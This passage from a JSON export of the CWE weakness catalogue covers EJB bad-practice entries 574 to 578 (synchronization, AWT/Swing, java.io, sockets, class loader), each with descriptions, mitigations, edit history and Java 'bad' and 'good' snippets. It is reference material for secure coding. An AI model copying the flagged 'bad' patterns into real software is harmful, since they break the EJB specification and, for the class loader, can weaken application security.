exploits.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-7140","Description":"Crypto implementation removes padding when it shouldn\'t, allowing forged signatures","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7140"},{"Reference":"CVE-2006-4339","Description":"Crypto implementation removes padding when it shouldn\'t, allowing forged signatures","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET10-J","Entry_Name":"Follow the general contract when implementing the compareTo() method"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Follow Specification","attr":{"@_Date":"2011-03-29"}}}},"574":{"attr":{"@_ID":"574","@_Name":"EJB Bad Practices: Use of Synchronization Primitives","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using thread synchronization primitives.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not use thread synchronization primitives to synchronize execution of multiple instances.\\" The specification justifies this requirement in the following way: \\"This rule is required to ensure consistent runtime semantics because while some EJB containers may use a single JVM to execute all enterprise bean\'s instances, others may distribute the instances across multiple JVMs.\\"","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not use Synchronization Primitives when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example a Customer Entity EJB provides access to customer information in a database for a business application.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Entitypublic class Customer implements Serializable {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String id;private String firstName;private String lastName;private Address address;public Customer() {...}public Customer(String id, String firstName, String lastName) {...}@Idpublic String getCustomerId() {...}public synchronized void setCustomerId(String id) {...}public String getFirstName() {...}public synchronized void setFirstName(String firstName) {...}public String getLastName() {...}public synchronized void setLastName(String lastName) {...}@OneToOne()public Address getAddress() {...}public synchronized void setAddress(Address address) {...}","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","",""]}}}},"Body_Text":"However, the customer entity EJB uses the synchronized keyword for the set methods to attempt to provide thread safe synchronization for the member variables. The use of synchronized methods violate the restriction of the EJB specification against the use synchronization primitives within EJBs. Using synchronization primitives may cause inconsistent behavior of the EJB when used within different EJB containers."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"575":{"attr":{"@_ID":"575","@_Name":"EJB Bad Practices: Use of AWT Swing","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using AWT/Swing.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not use the AWT functionality to attempt to output information to a display, or to input information from a keyboard.\\" The specification justifies this requirement in the following way: \\"Most servers do not allow direct interaction between an application program and a keyboard/display attached to the server system.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Do not use AWT/Swing when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java example is a simple converter class for converting US dollars to Yen. This converter class demonstrates the improper practice of using a stateless session Enterprise JavaBean that implements an AWT Component and AWT keyboard event listener to retrieve keyboard input from the user for the amount of the US dollars to convert to Yen.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class ConverterSessionBean extends Component implements KeyListener, ConverterSessionRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...private StringBuffer enteredText = new StringBuffer();private BigDecimal yenRate = new BigDecimal(\\"115.3100\\");public ConverterSessionBean() {}public BigDecimal dollarToYen(BigDecimal dollars) {}public void keyTyped(KeyEvent event) {}public void keyPressed(KeyEvent e) {}public void keyReleased(KeyEvent e) {}public void paint(Graphics g) {...}...","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:i":["/* member variables for receiving keyboard input using AWT API */","/* conversion rate on US dollars to Yen */","/* member functions for implementing AWT KeyListener interface */","/* member functions for receiving keyboard input and displaying output */"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"super();...addKeyListener(this);","xhtml:br":["","","",""],"xhtml:i":"/* method calls for setting up AWT Component for receiving keyboard input */"}},{"#text":"BigDecimal result = dollars.multiply(yenRate);return result.setScale(2, BigDecimal.ROUND_DOWN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class ConverterSessionBean implements ConverterSessionRemoteInterface {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private BigDecimal yenRate = new BigDecimal(\\"115.3100\\");public ConverterSessionBean() {}public BigDecimal dollarToYen(BigDecimal dollars) {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["/* conversion rate on US dollars to Yen */","/* remote method to convert US dollars to Yen */"],"xhtml:div":{"#text":"BigDecimal result = dollars.multiply(yenRate);return result.setScale(2, BigDecimal.ROUND_DOWN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},{"attr":{"@_Nature":"good","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;%@ page import=\\"converter.ejb.Converter, java.math.*, javax.naming.*\\"%&gt;&lt;%!%&gt;&lt;html&gt;&lt;/html&gt;","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Converter converter = null;public void jspInit() {}public void jspDestroy() {}","xhtml:br":["",""],"xhtml:div":[{"#text":"try {} catch (Exception ex) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"InitialContext ic = new InitialContext();converter = (Converter) ic.lookup(Converter.class.getName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"Couldn\'t create converter bean.\\"+ ex.getMessage());","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"converter = null;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;head&gt;&lt;title&gt;Converter&lt;/title&gt;&lt;/head&gt;&lt;body bgcolor=\\"white\\"&gt;&lt;/body&gt;","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;h1&gt;Converter&lt;/h1&gt;&lt;hr&gt;&lt;p&gt;Enter an amount to convert:&lt;/p&gt;&lt;form method=\\"get\\"&gt;&lt;/form&gt;&lt;%%&gt;&lt;p&gt;&lt;%= amount %&gt; dollars are &lt;%= yenAmount %&gt; Yen.&lt;p&gt;&lt;%%&gt;","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"&lt;input type=\\"text\\" name=\\"amount\\" size=\\"25\\"&gt;&lt;br&gt;&lt;p&gt;&lt;input type=\\"submit\\" value=\\"Submit\\"&gt;&lt;input type=\\"reset\\" value=\\"Reset\\"&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},{"#text":"String amount = request.getParameter(\\"amount\\");if ( amount != null &amp;&amp; amount.length() &gt; 0 ) {","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"BigDecimal d = new BigDecimal(amount);BigDecimal yenAmount = converter.dollarToYen(d);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"}","attr":{"@_style":"margin-left:10px;"}}]}}}}]}}],"Body_Text":["This use of the AWT and Swing APIs within any kind of Enterprise JavaBean not only violates the restriction of the EJB specification against using AWT or Swing within an EJB but also violates the intended use of Enterprise JavaBeans to separate business logic from presentation logic.","The Stateless Session Enterprise JavaBean should contain only business logic. Presentation logic should be provided by some other mechanism such as Servlets or Java Server Pages (JSP) as in the following Java/JSP example."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"576":{"attr":{"@_ID":"576","@_Name":"EJB Bad Practices: Use of Java I/O","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using the java.io package.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not use the java.io package to attempt to access files and directories in the file system.\\" The specification justifies this requirement in the following way: \\"The file system APIs are not well-suited for business components to access data. Business components should use a resource manager API, such as JDBC, to store data.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not use Java I/O when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java example is a simple stateless Enterprise JavaBean that retrieves the interest rate for the number of points for a mortgage. In this example, the interest rates for various points are retrieved from an XML document on the local file system, and the EJB uses the Java I/O API to retrieve the XML document from the local file system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class InterestRateBean implements InterestRateRemote {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Document interestRateXMLDocument = null;private File interestRateFile = null;public InterestRateBean() {}public BigDecimal getInterestRate(Integer points) {}private BigDecimal getInterestRateFromXML(Integer points) {...}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"interestRateFile = new File(Constants.INTEREST_RATE_FILE);if (interestRateFile.exists()){}","xhtml:br":["","","","",""],"xhtml:i":"/* get XML document from the local filesystem */","xhtml:div":{"#text":"DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();DocumentBuilder db = dbf.newDocumentBuilder();interestRateXMLDocument = db.parse(interestRateFile);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},{"#text":"return getInterestRateFromXML(points);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"/* member function to retrieve interest rate from XML document on the local file system */"}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class InterestRateBean implements InterestRateRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public InterestRateBean() {}public BigDecimal getInterestRate(Integer points) {}private BigDecimal getInterestRateFromXMLParser(Integer points) {...}","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return getInterestRateFromXMLParser(points);","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* member function to retrieve interest rate from XML document using an XML parser API */"}}}}],"Body_Text":["This use of the Java I/O API within any kind of Enterprise JavaBean violates the EJB specification by using the java.io package for accessing files within the local filesystem.","An Enterprise JavaBean should use a resource manager API for storing and accessing data. In the following example, the private member function getInterestRateFromXMLParser uses an XML parser API to retrieve the interest rates."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"577":{"attr":{"@_ID":"577","@_Name":"EJB Bad Practices: Use of Sockets","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using sockets.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not attempt to listen on a socket, accept connections on a socket, or use a socket for multicast.\\" The specification justifies this requirement in the following way: \\"The EJB architecture allows an enterprise bean instance to be a network socket client, but it does not allow it to be a network server. Allowing the instance to become a network server would conflict with the basic function of the enterprise bean-- to serve the EJB clients.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use Sockets when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java example is a simple stateless Enterprise JavaBean that retrieves stock symbols and stock values. The Enterprise JavaBean creates a socket and listens for and accepts connections from clients on the socket.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class StockSymbolBean implements StockSymbolRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ServerSocket serverSocket = null;Socket clientSocket = null;public StockSymbolBean() {}public String getStockSymbol(String name) {...}public BigDecimal getStockValue(String symbol) {...}private void processClientInputFromSocket() {...}","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}try {} catch (IOException e) {...}","xhtml:div":[{"#text":"serverSocket = new ServerSocket(Constants.SOCKET_PORT);","attr":{"@_style":"margin-left:10px;"}},{"#text":"clientSocket = serverSocket.accept();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class StockSymbolBean extends Thread implements StockSymbolRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ServerSocket serverSocket = null;Socket clientSocket = null;boolean listening = false;public StockSymbolBean() {}public String getStockSymbol(String name) {...}public BigDecimal getStockValue(String symbol) {...}public void run() {}","xhtml:br":["","","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}listening = true;while(listening) {}","xhtml:div":[{"#text":"serverSocket = new ServerSocket(Constants.SOCKET_PORT);","attr":{"@_style":"margin-left:10px;"}},{"#text":"start();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""]}},{"#text":"try {} catch (IOException e) {...}...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"clientSocket = serverSocket.accept();","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}]}}}}],"Body_Text":["And the following Java example is similar to the previous example but demonstrates the use of multicast socket connections within an Enterprise JavaBean.","The previous two examples within any type of Enterprise JavaBean violate the EJB specification by attempting to listen on a socket, accepting connections on a socket, or using a socket for multicast."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"578":{"attr":{"@_ID":"578","@_Name":"EJB Bad Practices: Use of Class Loader","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using the class loader.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"The enterprise bean must not attempt to create a class loader; obtain the current class loader; set the context class loader; set security manager; create a new security manager; stop the JVM; or change the input, output, and error streams.\\" The specification justifies this requirement in the following way: \\"These functions are reserved for the EJB container. Allowing the enterprise bean to use these functions could compromise security and decrease the container\'s ability to properly manage the runtime environment.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use the Class Loader when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java example is a simple stateless Enterprise JavaBean that retrieves the interest rate for the number of points for a mortgage. The interest rates for various points are retrieved from an XML document on the local file system, and the EJB uses the Class Loader for the EJB class to obtain the XML document from the local file system as an input stream.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class InterestRateBean implements InterestRateRemote {}}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Document interestRateXMLDocument = null;public InterestRateBean() {DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();} catch (IOException ex) {...}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ClassLoader loader = this.getClass().getClassLoader();InputStream in = loader.getResourceAsStream(Constants.INTEREST_RATE_FILE);","xhtml:br":["","","","",""],"xhtml:i":["// get XML document from the local filesystem as an input stream","// using the ClassLoader for this class"]}}}},{"#text":"DocumentBuilder db = dbf.newDocumentBuilder();interestRateXMLDocument = db.parse(interestRateFile);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public BigDecimal getInterestRate(Integer points) {}private BigDecimal getInterestRateFromXML(Integer points) {...}","xhtml:div":{"#text":"return getInterestRateFromXML(points);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["","","",""],"xhtml:i":"/* member function to retrieve interest rate from XML document on the local file system */"}}]}},"Body_Text":"This use of the Java Class Loader class within any kind of Enterprise JavaBean violates the restriction of the EJB specification against obtaining the current class loader as this could compromise the security of the application using the EJB."},{"Intro_Text":"An EJB is also restricted from creating a custom class loader and creating a class and instance of a class from the class loader, as shown in the following example.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class LoaderSessionBean implements LoaderSessionRemote {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public LoaderSessionBean() {}public class CustomClassLoader extends ClassLoader {}","xhtml:div":{"#text":"try {} catch (Exception ex) {...}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ClassLoader loader = new CustomClassLoader();Class c = loader.loadClass(\\"someClass\\");Object obj = c.newInstance();/* perform some task that uses the new class instance member variables or functions */...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}},"xhtml:br":["","","",""]}}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE 